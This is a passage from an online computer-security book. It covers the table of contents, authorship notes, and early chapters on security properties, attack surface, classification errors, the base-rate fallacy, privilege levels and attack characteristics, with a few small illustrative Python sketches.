Security Concepts
travis+security@subspacefield.org
Abstract
This is an online book about computer, network, technical, physical,
information and cryptographic security. It is a labor of love, incomplete
until the day I am finished.
Contents
1 Metadata
1.1 Copyright and Distribution Control
1.2 Goals
1.3 Audience
1.4 About This Work
1.5 How to Read the Online Version
1.6 About Writing This
1.7 Tools Used To Create This Book
2 Security Properties
2.1 Information Security is a PAIN
2.2 Parkerian Hexad
2.3 Pentagon of Trust
2.4 Security Equivalency
2.5 Other Questions
3 Security Concepts
3.1 Attack Surface
3.2 The Classification Problem
3.2.1 Classification Errors
3.2.2 The Base-Rate Fallacy
3.2.3 Test Efficiency
3.2.4 Incompletely-Defined Sets
3.2.5 The Guessing Hazard
3.3 Security Layers
3.4 Privilege Levels
3.5 Attack Characteristics
3.6 What is a Vulnerability?
3.7 Accuracy Limitations in Making Decisions That Impact Security
4 Adversaries and Threats
4.1 Common Psychological Errors
4.2 Cost-Benefit
4.3 Risk Tolerance
4.4 Capabilities
4.5 Sophistication Distribution
4.6 Goals
5 Physical Security
5.1 No Physical Security Means No Security
5.2 Data Remanence
5.2.1 Magnetic Storage Media (Disks)
5.2.2 Semiconductor Storage (RAM)
6 Distributed Systems
6.1 Cryptography is the Sine Qua Non of Secure Distributed Systems
6.2 Hello, My Name is 192.168.1.1
6.3 Source Tapping; The First Hop and Last Mile
6.4 Security Zones
6.5 Security Equivalent Things Go Together
6.6 Outsider Threats vs. Insider Threats
6.7 A Proposed Perimeter Defense
6.8 Man In The Middle
6.8.1 DNS Issues
6.8.2 IP Routing
6.8.3 Link-layer Issues
6.8.4 Physical Layer
6.8.5 Periodic Rechecking
6.8.6 Out-of-Band Comparison
6.8.7 Parallel Paths
6.8.8 Formatting
7 Identification and Authentication
7.1 Identity
7.2 What Authority?
7.3 Authentication Factors
7.4 Authentication Issues: When, What
7.5 The Identity Continuum
7.6 Problems Remaining Anonymous
7.7 Problems with Identifying People
7.8 Remote Attestation
8 Access Control
8.1 Privilege Escalation
8.2 Physical Access Control
8.3 Operating System Access Control: DAC, MAC, RBAC
9 Secure System Administration
9.1 Change Management
9.2 Self-Healing Systems
9.3 Heterogeneous vs. Homogeneous Defenses
10 Logging
10.1 Synchronized Time
10.2 Syslog
11 Reports
11.1 Change Reporting
11.2 Artificial Ignorance
11.3 Dead Man's Switch
12 Abuse Detection
12.1 Misuse Detection vs. Anomaly Detection
12.2 Honey Traps
12.3 Tripwires and Booby Traps
12.4 Anti-Malware
12.5 Anti-Spam
12.6 Detecting Automated Peers
12.6.1 CAPTCHA
12.6.2 Bot Traps
12.6.3 Velocity Checks
12.6.4 Typing Mistakes
12.7 Host-Based Intrusion Detection
12.8 Intrusion Detection Principles
12.9 Intrusion Information Collection
12.10 Intrusion Alerting
12.10.1 Possible Intrusion Alerting Solutions
13 Abuse Response
13.1 How to Respond to Abuse
13.2 The Silent Treatment
13.3 Random Response
13.4 Faux Positives
13.5 The Simulation Defense
13.5.1 Fishbowls
13.6 Hack-Back
13.6.1 Reverse-Hack
13.6.2 Mirror Defense
13.6.3 Counterhack
13.7 Identification Issues
13.8 Proportional Response
14 Forensics
14.1 Forensic Limitations
14.2 Ephemeral Data
14.3 Remnant Data
14.4 Hidden Data
14.5 Metadata
14.6 Forensic Inference
15 Network Security
15.1 The Current State of Things
15.2 Traffic Identification: RPC, Dynamic Ports, User-Specified Ports and Encapsulation
15.2.1 RPC
15.2.2 Dynamic Port Numbers
15.2.3 Encapsulation
15.2.4 Possible Solutions
15.3 Advanced Network Security Technologies
16 Web Security
16.1 Direct Browser Attacks
16.2 Indirect Browser Attacks
16.3 SSL Certificates Made Redundant
17 Application Security
17.1 Security is a Subset of Correctness
17.2 Malware vs. Data-Directed Attacks
17.3 Reverse Engineering
17.4 Application Exploitation
17.5 Application Exploitation Defenses
17.5.1 Stack-Smashing Protection
17.5.2 Address-Space Layout Randomization (ASLR)
17.5.3 Write XOR Execute
17.6 Software Complexity
17.6.1 Complexity of Network Protocols
17.6.2 Polymorphism and Complexity
17.7 Failure Modes
17.8 Fault Tolerance
17.9 Implications of Incorrectness
18 Trust
18.1 Trust and Trustworthiness
18.2 Code Provenance: Signed Programs and Trusted Authors
19 Cryptology
19.1 Limits of Cryptography
19.1.1 The Last Foot of the Communication
19.1.2 Limitations Regarding Endpoint Security
19.1.3 In Practice
19.2 How Strong Should My Cryptography Be?
19.2.1 Key Lengths
19.3 Cryptographic Algorithms
19.3.1 Combiners
19.3.2 Speed of Algorithms and the Hybrid Encryption Scheme
19.3.3 HMAC: The Symmetric Digital Signature
19.4 Cryptographic Algorithm Enhancements
19.4.1 Hashing Stored Authentication Data
19.4.2 Offline Dictionary Attacks and Iterated Hashes
19.4.3 Salts vs. Offline Dictionary Attacks and Rainbow Tables
19.4.4 Offline Dictionary Attacks with Partial Confidentiality
19.5 Cryptographic Combinations
19.5.1 The Sign then Encrypt Problem
19.5.2 Key Derivation Functions
19.6 Cryptographic Protocols
19.6.1 DoS and Anti-Clogging Tokens
19.6.2 The Problem with Authenticating within an Encrypted Channel
19.6.3 How to Protect the Integrity of a Session
19.6.4 Freshness and Replay Attacks
19.6.5 Authentication
19.6.6 Key Exchange and Hybrid Encryption Schemes
19.7 Encrypted Storage
19.7.1 Key Escrow for Encrypted Storage
19.7.2 Evolution of Cryptographic Storage Technologies
19.7.3 Filesystem Crypto Layers
19.7.4 File Systems with Optional Encryption
19.7.5 Block Device Crypto
19.7.6 The Cryptographically-Strong Pseudo-random Quick Fill
19.7.7 Backups
19.8 Key Management
19.8.1 Key Exchange and the Bootstrapping Problem
19.8.2 One Key, One Purpose
19.8.3 Time Compartmentalization
19.8.4 Key Indirection
19.8.5 Secret Sharing
20 Randomness and Unpredictability
20.1 What is an Ideal Random Number Generator?
20.2 Definitions of Unpredictability
20.3 Definitions of Randomness
20.4 Why Entropy and Unpredictability Are Not The Same
20.5 Unpredictability is the Sine Qua Non of Cryptography
20.6 Predictability is Provable, Unpredictability is Not
20.7 Randomly-Generated Samples Are No Different Than Any Other Sample
20.8 Testing For Predictability
20.9 Ways to Fail
20.10 Humans Are Too Predictable
20.11 Sources of Unpredictability
20.12 The Laws of Unpredictability
21 Lateral Thinking
21.1 Traffic Analysis
21.2 Side Channels
21.2.1 Physical Information-Gathering Attacks and Defenses
21.2.2 Signal Injection Attacks and Defenses
21.2.3 System-Local Side-Channel Attacks
21.2.4 Timing Side-Channels
22 Information and Intelligence
22.1 Controlling Information Flow
22.2 Labeling and Regulations
22.3 Knowledge is Power
22.4 Secrecy is Power
22.5 Never Confirm Guesses
22.6 What You Don't Know Can Hurt You
22.7 How Secrecy is Lost
22.8 Costs of Disclosure
22.9 Dissemination
22.10 Information, Misinformation, Disinformation
23 Conflict and Combat
23.1 Indicators and Warnings
23.2 Attacker's Advantage in Network Warfare
23.3 Defender's Advantage in Network Warfare
23.4 OODA Loops
24 Security Principles
24.1 The Principle of Least Privilege
24.2 The Principle of Agility
24.3 The Principle of Minimal Assumptions
24.4 The Principle of Fail-Secure Design
24.5 The Principle of Unique Identifiers
24.6 The Principles of Simplicity
24.7 The Principle of Defense in Depth
24.8 The Principle of Uniform Fronts
24.9 The Principle of Split Control
24.10 The Principle of Minimal Changes
24.11 The Principle of Centralized Management
24.12 The Principle of Least Surprise
24.13 The Principle of Removing Excuses
24.14 The Principle of Retaining Control
24.15 Availability Principles
25 Common Arguments
25.1 Disclosure: Full, Partial, or None?
25.1.1 Arguments for Full Disclosure
25.1.2 Arguments Against Full Disclosure - Vendor
25.1.3 Arguments Against Full Disclosure - Vendor's Employees
25.1.4 Arguments Against Full Disclosure - End User
25.2 Theorists vs. Pragmatists, Absolute vs. Effective Security
25.3 Quantification and Metrics vs. Intuition
25.4 Security Through Obscurity
25.5 Security of Open Source vs. Closed Source
25.6 Prevention vs. Detection
25.7 Prevention vs. Monitoring
25.8 Early vs. Late Adopters
26 Editorials, Predictions, Polemics, and Personal Opinions
26.1 Security is for Polymaths
26.2 Computers are Transcending our Limitations
26.3 Reusable Authentication Data Considered Harmful
26.4 Password Length Limits Considered Harmful
26.5 Everything Will Be Encrypted Soon
26.6 Error Propagation Characteristics Usually Don't Matter
26.7 Keep it Legal, Stupid
26.8 Should My Employees Attend "Hacker" Conferences?
26.9 I'm a Young Hacker, Should I Sell Out and Do Security for a Corporation?
26.10 Anonymity is not a Crime
26.10.1 Example: Sears Makes Customer Purchase Information Available Online, Provides Spyware to Customers
26.11 Monitoring Your Employees
26.12 Trust People in Spite of Counterexamples
26.13 Do What I Mean vs. Do What I Say
27 Resources
27.1 My Other Stuff
27.2 Conferences
27.3 Books
27.3.1 Publishers
27.3.2 Titles
27.4 Periodicals
27.5 Blogs
27.6 Mailing Lists
28 Credits
1 Metadata
1.1 Copyright and Distribution Control
Kindly link a person to it instead of redistributing it, so that people
may always receive the latest version. However, even an outdated copy
is better than none. The PDF version is preferred and more likely
to render properly (especially graphics and special mathematical characters),
but the HTML version is simply too convenient to not have it available.
The latest version is always here:
- PDF: http://www.subspacefield.org/security/security_concepts.pdf
- HTML: http://www.subspacefield.org/security/security_concepts.html
This is a copyrighted work, with some rights reserved. This work is
licensed under the Creative Commons Attribution-Noncommercial-No
Derivative Works 3.0 United States License (http://creativecommons.org/licenses/by-nc-nd/3.0/us/).
This means you may redistribute it, so long as you attribute me
properly (without suggesting I endorse your work) and
do not use it for commercial purposes. For attribution, please include
a prominent link back to this original work and some text describing
the changes. I am comfortable with certain derivative works, such
as translation into other languages, but not sure about others, so
have not yet explicitly granted permission for all derivative uses.
If you have any questions, please email me and I'll be happy to discuss
it with you.
1.2 Goals
I wrote this paper to try and examine the typical problems in computer
security and related areas, and attempt to extract from them principles
for defending systems. To this end I attempt to synthesize various
fields of knowledge, including computer security, network security,
cryptology, and intelligence. I also attempt to extract the principles
and implicit assumptions behind cryptography and the protection of
classified information, as obtained through reverse-engineering (that
is, informed speculation based on existing regulations and stuff I
read in books), where they are relevant to technological security.
1.3 Audience
When I picture a perfect reader, I always picture a monster of courage
and curiosity, also something supple, cunning, cautious, a born adventurer
and discoverer.
- Friedrich Nietzsche
This is not intended to be an introductory text, although a beginner
could gain something from it. The reason behind this is that beginners
think in terms of tactics, rather than strategy, and of details rather
than generalities. There are many fine books on computer and network
security tactics (and many more not-so-fine books), and tactics change
quickly, and being unpaid for this work, I am a lazy author. The reason
why even a beginner may gain from it is that I have attempted to extract
abstract concepts and strategies which are not necessarily tied to
computer security. And I have attempted to illustrate the points with
interesting and entertaining examples and would love to have more,
so if you can think of an example for one of my points, please send
it to me!
I'm writing this for you, noble reader, so your comments are very
welcome; you will be helping me make this better for every future
reader. If you send a contribution or comment, you'll save me a lot
of work if you tell me whether you wish to be mentioned in the credits
(see 28) or not; I want to respect the privacy of
anonymous contributors. If you're concerned that would be presumptuous,
don't be; I consider it considerate of you to save me an email exchange.
Security bloggers will find plenty of fodder by looking for new URLs
added to this page, and I encourage you to do it, since I simply don't
have time to comment on everything I link to. If you link to this
paper from your blog entry, all the better.
1.4 About This Work
I have started this book with some terminology as a way to frame the
discussion. Then I get into the details of the technology. Since this
is adequately explained in other works, these sections are somewhat
lean and may merely be a list of links. Then I get into my primary
contribution, which is the fundamental principles of security which
I have extracted from the technological details. Afterwards, I summarize
some common arguments that one sees among security people, and I finish
up with some of my personal observations and opinions.
1.5 How to Read the Online Version
Since this document is constantly being revised, I suggest that you
start with the table of contents and click on the subject headings
so that you can see which ones you have read already. If I add a section,
it will show up as unread. By the time it has expired from your browser's
history, it is probably time to re-read it anyway, since the contents
have probably been updated.
See the end of this page for the date it was generated (which is also
the last update time). I currently update this about once every two
weeks.
1.6 About Writing This
Part of the challenge with writing about this topic is that we are
always learning and it never seems to settle down, nor does one ever
seem to get a sense of completion. I consider it more permanent and
organized than a blog, more up-to-date than a book, and more comprehensive
and self-contained than most web pages. I know it's uneven; in some
areas it's just a heading with a paragraph, or a few links, in other
places it can be as smoothly written as a book. I thought about breaking
it up into multiple documents, so I could release each with much more
fanfare, but that's just not the way I write, and it makes it difficult
to do as much cross-linking as I'd like.
This is to my knowledge the first attempt to publish a computer security
book on the web before printing it, so I have no idea if it will even
be possible to print it commercially. That's okay; I'm not writing
for money. I'd like for the Internet to be the public library of the
21st century, and this is my first significant donation
to the collection. I am reminded of the advice of a staffer in the
computer science department, who said, "do what you love, and
the money will take care of itself".
That having been said, if you want to contribute towards the effort, you can help
me defray the costs of maintaining a server and such by visiting our
donation page (http://www.subspacefield.org/donate.html). If
you would like to donate but cannot, you may wait until such a time
as you can afford to, and then give something away (i.e. pay it forward).
1.7 Tools Used To Create This Book
I use LyX (http://www.lyx.org/), but I'm still a bit of a novice.
I have a love/hate relationship with it and the underlying typesetting
language LaTeX (http://en.wikipedia.org/wiki/LaTeX).
2 Security Properties
What do we mean by secure? When I say secure, I mean that an
adversary can't make the system do something that its owner (or designer,
or administrator, or even user) did not intend. Often this involves
a violation of a general security property. Some security properties
include:
- confidentiality refers to whether the information in question
is disclosed or remains private.
- integrity refers to whether the systems (or data) remain uncorrupted.
The opposite of this is malleability, where it is possible
to change data without detection, and believe it or not, sometimes
this is a desirable security property.
- availability is whether the system is available when you need
it or not.
- consistency is whether the system behaves the same each time
you use it.
- auditability is whether the system keeps good records of what
has happened so it can be investigated later. Direct-record electronic
voting machines (with no paper trail) are unauditable.
- control is whether the system obeys only the authorized users
or not.
- authentication is whether the system can properly identify users.
Sometimes, it is desirable that the system cannot do so, in which
case it is anonymous or pseudonymous.
- non-repudiation is a relatively obscure term meaning that if
you take an action, you won't be able to deny it later. Sometimes,
you want the opposite, in which case you want repudiability
("plausible deniability").
Please forgive the slight difference in the way they are named; while
English is partly to blame, these properties are not entirely parallel.
For example, confidentiality refers to information (or inferences
drawn on such) just as program refers to an executable stored on the
disk, whereas control implies an active system just as process refers
to a running program (as they say, "a process is a program in
motion"). Also, you can compromise my data confidentiality with
a completely passive attack such as reading my backup tapes, whereas
controlling my system is inherently detectable since it involves interacting
with it in some way.
2.1 Information Security is a PAIN
You can remember the security properties of information as PAIN: Privacy,
Authenticity, Integrity, Non-Repudiation.
2.2 Parkerian Hexad
There is something similar known as the "Parkerian Hexad", defined
by Donn B. Parker, which is six fundamental, atomic, non-overlapping
attributes of information that are protected by information security
measures:
- confidentiality
- possession
- integrity
- authenticity
- availability
- utility
2.3 Pentagon of Trust
- Admissibility (is the remote node trustworthy?)
- Authentication (who are you?)
- Authorization (what are you allowed to do?)
- Availability (is the data accessible?)
- Authenticity (is the data intact?)
2.4 Security Equivalency
I consider two objects to be security equivalent if they are
identical with respect to the security properties under discussion;
for precision, I may refer to confidentiality-equivalent pieces
of information if the sets of parties to which they may be disclosed
(without violating security) are exactly the same (and conversely,
so are the sets of parties to which they may not be disclosed). In
this case, I'm discussing objects which, if treated improperly, could
lead to a compromise of the security goal of confidentiality.
Or I could say that two cryptosystems are confidentiality-equivalent,
in which case the objects help achieve the security goal. To be perverse,
these last two examples could be combined; if the information in the
first example was actually the keys for the cryptosystem in the second
example, then disclosure of the first could impact the confidentiality
of the keys and thus the confidentiality of anything handled by the
cryptosystems. Alternately, I could refer to access-control equivalence
between two firewall implementations; in this case, I am discussing
objects which implement a security mechanism which helps us
achieve the security goal, such as confidentiality of something.
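As a minimal sketch of the confidentiality-equivalence definition above, two pieces of information can be compared by the sets of parties allowed to see them. The function name and the example parties are hypothetical, chosen only for illustration.

```python
def confidentiality_equivalent(allowed_a, allowed_b):
    """Two objects are confidentiality-equivalent if exactly the same
    parties may receive each of them without violating security."""
    return set(allowed_a) == set(allowed_b)


# Hypothetical disclosure lists for three pieces of information.
payroll_readers = {"alice", "bob"}
salary_history_readers = {"bob", "alice"}
press_release_readers = {"alice", "bob", "carol"}

same = confidentiality_equivalent(payroll_readers, salary_history_readers)
different = confidentiality_equivalent(payroll_readers, press_release_readers)
print(same, different)
```

Given a fixed universe of parties, equal "may disclose" sets imply equal "may not disclose" sets, which is the converse noted in the text.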
2.5 Other Questions
- Secure to whom? A web site may be secure (to its owners) against unauthorized
control, but may employ no encryption when collecting information
from customers.
- Secure from whom? A site may be secure against outsiders, but not
insiders.
3 Security Concepts
There is no security on this earth, there is only opportunity.
- General Douglas MacArthur (1880-1964)
These are important concepts which appear to apply across multiple
security domains.
3.1 Attack Surface
Gnothi Seauton ("Know Thyself")
- ancient Greek aphorism (http://en.wikipedia.org/wiki/Know_thyself)
When discussing security, it's often useful to analyze the part which
may interact with a particular adversary (or set of adversaries).
For example, let's assume you are only worried about remote adversaries.
If your system or network is only connected to the outside world via the
Internet, then the attack surface is the parts of your system that
interact with things on the Internet, or the parts of your system
which accept input from the Internet. A firewall, then, limits the
attack surface to a smaller portion of your systems by filtering some
of your network traffic. Often, the firewall blocks all incoming connections.
Sometimes the attack surface is pervasive. For example, if you have
a network-enabled embedded device like a web cam on your network that
has a vulnerability in its networking stack, then anything which can
send it packets may be able to exploit it. Since you probably can't
fix the software in it, you must then use a firewall to attempt to
limit what can trigger the bug. Similarly, there was a bug in sendmail
that could be exploited by sending a carefully-crafted email through
a vulnerable server. The interesting bit here is that it might be
an internal server that wasn't exposed to the Internet; the exploit
was data-directed and so could be passed through your infrastructure
until it hit a vulnerable implementation. That's why I consistently
use one implementation (not sendmail) throughout my network now.
If plugging a USB drive into your system causes it to automatically
run things like a standard Microsoft Windows XP install, then any
plugged-in device is part of the attack surface (http://it.slashdot.org/article.pl?sid=08/01/13/1533243).
But even if it does not, then by plugging a USB device in you could
potentially overflow the code which handles the USB or the driver
for the particular device which is loaded (http://www.eweek.com/article2/0,1895,1840141,00.asp,
http://www.schneier.com/blog/archives/2006/06/hacking_compute.html);
thus, the USB networking code and all drivers are part of the attack
surface if you can control what is plugged into the system. Moreover,
a recent vulnerability (http://it.slashdot.org/it/08/01/14/1319256.shtml)
illustrates that when you have something which inspects network traffic,
such as UPnP devices or port knocking daemons, then their code forms
part of the attack surface.
Sometimes you will hear people talk about the "anonymous attack
surface"; this is the attack surface available to everyone (on the
Internet). Since this number of people is so large, and you usually
can't identify them or punish them, you want to be really sure that
the anonymous attack surface is limited and doesn't have any so-called
"pre-auth" vulnerabilities, because those can be exploited prior
to identification and authentication.
3.2 The Classification Problem
Many times in security you wish to distinguish between classes of
data. This occurs in firewalls, where you want to allow certain traffic
but not all, and in intrusion detection where you want to allow benign
traffic but not allow malicious traffic, and in operating system security,
where you want to allow the user to run their programs but not malware. In
doing so, we run into a number of limitations in various domains that
deserve mention together.
3.2.1 Classification Errors
False Positives vs. False Negatives, also called Type I and Type II
errors. Discuss equal error rate (EER) and its use in biometrics.
Sometimes in medicine they will do a cheap test with a high error
rate biased one direction (often false positives), and a more expensive
test with a lower error rate, usually biased in the other direction.
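As a rough illustration of the two error types named above, the rates can be computed from the four outcome counts of a binary test. The function name and the sample counts are assumptions made up for this sketch, not measurements from any real system.

```python
def error_rates(true_pos, false_pos, true_neg, false_neg):
    """Return (false_positive_rate, false_negative_rate) for a binary test.

    Type I error  = false positive: a benign item flagged as malicious.
    Type II error = false negative: a malicious item passed as benign.
    """
    benign = false_pos + true_neg        # everything that was actually benign
    malicious = true_pos + false_neg     # everything that was actually malicious
    return false_pos / benign, false_neg / malicious


# Hypothetical counts: 1000 benign items and 100 malicious ones.
fpr, fnr = error_rates(true_pos=90, false_pos=50, true_neg=950, false_neg=10)
print(f"false positive rate: {fpr:.1%}")
print(f"false negative rate: {fnr:.1%}")
```

The equal error rate is the operating point at which these two rates coincide as the test's decision threshold is varied.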
3.2.2 The Base-Rate Fallacy
In The Base Rate Fallacy and its Implications for Intrusion
Detection (http://www.raid-symposium.org/raid99/PAPERS/Axelsson.pdf),
the author essentially points out that there's a lot of benign traffic
for every attack, and so even a small chance of a false positive will
quickly overwhelm any true positives. Put another way, if one out
of every 10,001 connections is malicious, and the test has a 1% false
positive error rate, then for every 1 real malicious connection there
are 10,000 benign connections, and hence 100 false positives.
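The arithmetic above can be checked with a short sketch. It assumes, for simplicity, that the test catches every real attack (a 100% detection rate); that assumption and the function name are mine, not the paper's.

```python
def alert_breakdown(benign, malicious, false_positive_rate, detection_rate=1.0):
    """Return (false_alarms, true_alarms, fraction_of_alerts_that_are_real).

    detection_rate=1.0 is an assumption: every real attack raises an alert.
    """
    false_alarms = benign * false_positive_rate
    true_alarms = malicious * detection_rate
    precision = true_alarms / (true_alarms + false_alarms)
    return false_alarms, true_alarms, precision


# The example from the text: 1 malicious connection per 10,000 benign ones,
# with a 1% false positive rate.
false_alarms, true_alarms, precision = alert_breakdown(10_000, 1, 0.01)
print(f"false alarms: {false_alarms:.0f}, true alarms: {true_alarms:.0f}")
print(f"fraction of alerts that are real: {precision:.2%}")
```

Even with a perfect detection rate, only about one alert in a hundred corresponds to a real attack under these numbers.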
3.2.3 Test Efficiency
In other cases, you are perfectly capable of performing an accurate
test, but not on all the traffic. You may want to apply a cheap test
with some errors on one side before applying a second, more expensive
test on the side with errors to weed them out. This is done in BSD
Unix with packet capturing via tcpdump, which uploads a coarse filter
into the kernel, and then applies a more expensive but finer-grained
test in userland which only operates on the packets which pass the
first test.
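The two-stage pattern described above can be sketched as follows. This is not how tcpdump or the kernel filter is actually implemented; the packet dictionaries, port number, and payload check are hypothetical stand-ins for a cheap coarse test and a costly fine-grained one.

```python
def cheap_test(packet):
    """Coarse first pass: looks only at the destination port.
    It may pass packets we do not want, but never drops ones we do."""
    return packet["dst_port"] == 80


def expensive_test(packet):
    """Fine-grained second pass: inspects the payload (assumed costly)."""
    return b"/admin" in packet["payload"]


def two_stage_filter(packets):
    """Return (matches, expensive_calls). The expensive test runs only
    on packets that survived the cheap one."""
    matches = []
    expensive_calls = 0
    for packet in packets:
        if not cheap_test(packet):
            continue
        expensive_calls += 1
        if expensive_test(packet):
            matches.append(packet)
    return matches, expensive_calls


# Hypothetical traffic sample.
packets = [
    {"dst_port": 22, "payload": b"SSH-2.0"},
    {"dst_port": 80, "payload": b"GET /index.html"},
    {"dst_port": 80, "payload": b"GET /admin"},
    {"dst_port": 53, "payload": b"/admin"},
]
matches, expensive_calls = two_stage_filter(packets)
print(len(matches), "match;", expensive_calls, "expensive checks for", len(packets), "packets")
```

The cheap test errs only on the side of passing too much, so the expensive test is what removes the remaining false positives.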
3.2.4 Incompletely-Defined Sets
As far as the laws of mathematics refer to reality, they are not certain;
and as far as they are certain, they do not refer to reality.
- Albert Einstein
Stop for a moment and think about the difficulty of trying to list
all the undesirable things that your computer shouldn't do. If you
find yourself finished, then ask yourself: did you include that it
shouldn't attack other computers? Did you include that it shouldn't
transfer $1000 to a mafia-run web site when you really intended to
transfer $100 to your mother? Did you include that it shouldn't send
spam to your address book? The list goes on and on.
Thus, if we had a complete list of everything that was bad, we'd block
it and never have to worry about it again. However, often we either
don't know, or the set is infinite. Similarly, we may not be able
to obtain a complete list of everything that is good; imagine trying
to specify in advance all the network packets that should be allowed
into your enterprise!
3.2.5 The Guessing Hazard
So often we can't enumerate all the things we would want to do, nor
all the things that we would not want to do. Because of this, intrusion
detection systems (see 12) often simply guess;
they try to detect attacks unknown to them by looking for features
that are likely to be present in malware but not in normal traffic.
At the current moment, you can find out if your traffic is passing
through an IPS by trying to send a long string of A's in a session.
This isn't malicious by itself, but A is a common letter with which
people pad exploits (see 17.4). In
this case, it's a great example of a false positive, or collateral
damage, generated through guilt-by-association; there's nothing
inherently suspicious about a string of A's, it's just that
exploit writers use them a lot, and IPS vendors decided that made
them suspicious. I'm not a big fan of these because I feel that it
breaks functionality that doesn't threaten the system, and that it
could be used as evidence of malfeasance against someone by someone
who doesn't really understand the technology. I'm already irritated
by the false-positives or excessive warnings about security tools
from anti-virus software; it seems to alert to "potentially-unwanted
programs" an absurd amount of the time; most novices don't understand
that the anti-virus software reads the disk even though I'm not running
the programs, and that you have nothing to fear if you don't run the
programs. I fear that one day my Internet Service Provider will start
filtering them out of my email or network streams, but fortunately
they just don't care that much.
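To make the guilt-by-association problem concrete, here is a minimal sketch of the kind of heuristic described above. The function name and the threshold of 64 are assumptions for illustration; no particular IPS product is being described.

```python
def looks_like_exploit_padding(payload: bytes, threshold: int = 64) -> bool:
    """Flag any payload containing `threshold` or more consecutive 'A' bytes.

    This guesses at malice from a feature common in exploits; it knows
    nothing about whether the payload is actually harmful.
    """
    return b"A" * threshold in payload


# Hypothetical benign traffic: someone pasting a long run of A's into a form.
benign_upload = b"title=" + b"A" * 200
ordinary_request = b"GET /index.html HTTP/1.1"

flagged_benign = looks_like_exploit_padding(benign_upload)
flagged_ordinary = looks_like_exploit_padding(ordinary_request)
print(flagged_benign, flagged_ordinary)
```

The benign upload is flagged even though nothing about it threatens the system, which is exactly the false positive complained about above.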
3.3 Security Layers
I like to think of security as a hierarchy. At the base, you have
physical security. On top of that is OS security, and on top of that
is application security, and on top of that, network security. You
may have an unbeatable firewall, but if your OS doesn't require a
password and your adversary has physical access, you lose. So each
layer of the pyramid cannot be more secure (in an absolute sense)
than the layer below it. Ideally, each layer should be available to
fewer adversaries than the layer above it, so that one has a sort
of balance or risk equivalency.
- network security
- application/database security
- OS security
- physical security
In operating system security, we distinguish between users
of the system, and perhaps the roles they are fulfilling, and only
concern ourselves with activities within that computer. It is assumed
that the adversary has some access, but less than full privileges
on the system. In network security, we concern ourselves with
nodes in the network (usually individual computers), and do not distinguish
between users of each system. In some sense, we are now assigning
rights to computers and not people. This is often justified since
it is usually easier to leverage one user's access to gain another's
within the same system than to gain access to another system (but
this is not a truism).
3.4 Privilege Levels
Here's a taxonomy of some commonly-useful privilege levels.
- Anonymous, remote systems
- Authenticated remote systems
- Local unprivileged user (UID > 0)
- Administrator (UID 0)
- Kernel (privileged mode, ring 0)
- Hardware (TPM, ring -1, hypervisors, trojaned hardware)
Actual systems may vary, levels may not be strictly hierarchical,
etc. Basically the higher the level you get, the harder you are to
detect. The gateways between the levels are access control devices,
analogous to firewalls.
3.5 Attack Characteristics
Not all attacks are created equal. They may sometimes be grouped together
in various ways, though, and so that leads us to ask whether there
are any dimensions, or characteristics, by which we may classify known
attacks.
- access required to execute the attack varies; some attacks require
a system account, while others can be exploited by anyone on the Internet.
- detectability usually means that the attack involves a non-standard
interaction with us, and therefore involves something which we could
(in theory) look for and recognize. Passive attacks, typically eavesdropping,
are very difficult or impossible to detect.
- recoverability refers to whether we may, after detecting or suspecting
an attack, restore the state of the system to a secure one. Usually
once an adversary has complete control of a system, we cannot return
it to a secure state without some unusual actions, because they may
have tampered with any tools we may be using to inspect or fix the
system.
- preventability refers to whether there exists a defense which
allows us to prevent it, or whether we must be content with detecting
it. We can sometimes prevent attacks we cannot detect; for example,
we can prevent someone from reading our wireless transmissions by
encrypting them properly, but we can't usually detect whether or not
any third party is receiving them.
- scalability means the same attack will probably work against
many systems, and does not require human effort to develop or customize
for each system.
- offline exploitability means that the attack may be conducted
once but exploited several times, as when you steal a cryptographic
key.
- sophistication refers to the property of requiring a great deal
of skill, versus an unsophisticated attack like guessing a password
to a known system account.
Much of this list is thanks to the Everest voting machine report (http://www.sos.state.oh.us/sos/info/EVEREST/14-AcademicFinalEVERESTReport.pdf).
Putting a key in a smart card or TPM or HSM prevents it from being
copied and reused later, offline, but it doesn't prevent it from being
abused by the adversary while he has control of its inputs. For example,
a trojan can submit bogus documents to a smart card to have them signed,
and the user has no way of knowing. Similarly, sometimes techniques
like putting passphrases on SSH keys can prevent them from being stolen
right away, requiring a second visit (or at least an exfiltration
at a later date). However, each interaction with the system by the
adversary risks detection, so he wants to do so once only, instead
of multiple times.
For example, your adversary could pilfer your SSL cert, and then use
it to create a phishing site elsewhere. This is a single loss of confidentiality,
then an authentication attack (forgery) not against you, but against
your customers (third parties). Or he could pilfer your GPG key, then
use it to forge messages from you (a similar detectable attack) or
read your email (passive attack, undetectable). Or he might break
in, wanting to copy your SSH key, find that it's encrypted with a
passphrase, install a key logger, and come back later to retrieve
the passphrase (two active attacks). Alternately, the key logger could
send the data out automatically (exfiltration).
3.6 What is a Vulnerability?
Now that you know what a security property is, what constitutes (or
should constitute) a vulnerability? On the arguable end of the scale
we have "loss of availability", or susceptibility to denial
of service (DoS). On the inarguable end of the scale, we have "loss
of control", which usually means arbitrary code execution, which often
means that the adversary can do whatever he wants with the system,
and therefore can violate any other security property.
3.7 Accuracy Limitations in Making Decisions That Impact Security
On two occasions I have been asked, "Pray, Mr. Babbage, if you
put into the machine wrong figures, will the right answers come out?"
In one case a member of the Upper, and in the other a member of the
Lower, House put this question. I am not able rightly to apprehend
the kind of confusion of ideas that could provoke such a question.
- Charles Babbage
This is sometimes called the GIGO rule (Garbage In, Garbage Out).
Stated this way, this seems self-evident. However, you should realize
that this applies to systems as well as programs. For example, if
your system depends on DNS to locate a host, then the correctness
of your system's operation depends on DNS. Whether or not this is
exploitable (beyond a simple denial of service) depends a great deal
on the details of the procedures. This is a parallel to the question
of whether it is possible to exploit a program via an unsanitized
input.
You can never be more accurate than the data you used for your input.
Try to be neither precisely inaccurate, nor imprecisely accurate.
Learn to use footnotes.
4 Adversaries and Threats
If you know the enemy and know yourself, you need not fear the result
of a hundred battles.
If you know yourself but not the enemy, for every victory gained you
will also suffer a defeat.
If you know neither the enemy nor yourself, you will succumb in every
battle.
- Sun Tzu, The Art of War (http://en.wikipedia.org/wiki/The_Art_of_War)
After deciding what you need to protect (your assets), you
need to know about the threats you wish to protect them against,
or the adversaries (sometimes called threat agents)
which may threaten them. Generally intelligence units have threat
shops, where they monitor and keep track of the people who may threaten
their operations. This is natural, since it is easier to get an idea
of who will try and do something than how some unspecified person
may try to do it, and can help by hardening systems in enemy territory
more than those in safer areas, leading to more efficient use of resources.
In technology, people tend to focus on how rather than who, which
seems to work better when anyone can potentially attack any system
(like with publicly-facing systems on the Internet) and when protection
mechanisms have low or no incremental cost (like with free and open-source
